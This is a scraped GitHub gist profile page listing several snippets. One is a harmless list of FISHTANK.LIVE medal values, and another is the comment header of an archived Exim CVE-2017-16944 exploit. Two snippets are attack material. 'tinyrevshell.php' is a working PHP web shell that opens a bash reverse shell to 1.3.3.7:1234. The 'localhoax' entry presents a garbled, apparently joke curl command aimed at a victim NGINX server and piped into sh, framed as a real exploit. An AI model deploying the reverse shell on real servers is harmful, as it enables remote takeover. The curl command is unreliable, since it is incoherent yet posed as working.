Skip to content

Instantly share code, notes, and snippets.

View LetUsFsck's full-sized avatar

Let Us Fsck. LetUsFsck

64 followers · 47 following
  • The Company
View GitHub Profile
@LetUsFsck
LetUsFsck / gist:eb394639445e512991a4ea3abb887d30
Created October 23, 2023 08:22
All FISHTANK.LIVE Medals & Challenges (API PULL: OCTOBER 2023)
LOWEST: 5
LOW: 10
NORMAL: 25
HIGH: 50
HIGHEST: 100
[f.mV.BETA_TESTER]: {
name: "Beta Test"
@LetUsFsck
LetUsFsck / localhoax-curl-volume1-cli-only
Created June 1, 2019 10:46
Command Line Trickery Volume 1 - Raw Command Only
Change only the "VICTIM-SERVER-HERE" to NGINX server IP or hostname.
curl -gsS https://VICTIM-SERVER-HERE:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
That's it! For details on all of this, check out http://localhoax.eh.gl
@LetUsFsck
LetUsFsck / tinyrevshell.php
Created December 15, 2018 07:42
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/1.3.3.7/1234 0>&1'");
@LetUsFsck
LetUsFsck / poc.py
Last active November 26, 2017 06:51
CVE-2017-16944 PoC/Exploit Archive
# ARCHIVE FROM https://bugs.exim.org/attachment.cgi?id=1052
# Conversation
# https://bugs.exim.org/show_bug.cgi?id=2199
# https://bugs.exim.org/show_bug.cgi?id=2201
#
#
# CVE-2017-16944 (Associated: CVE-2017-16943)
#
# pip install pwntools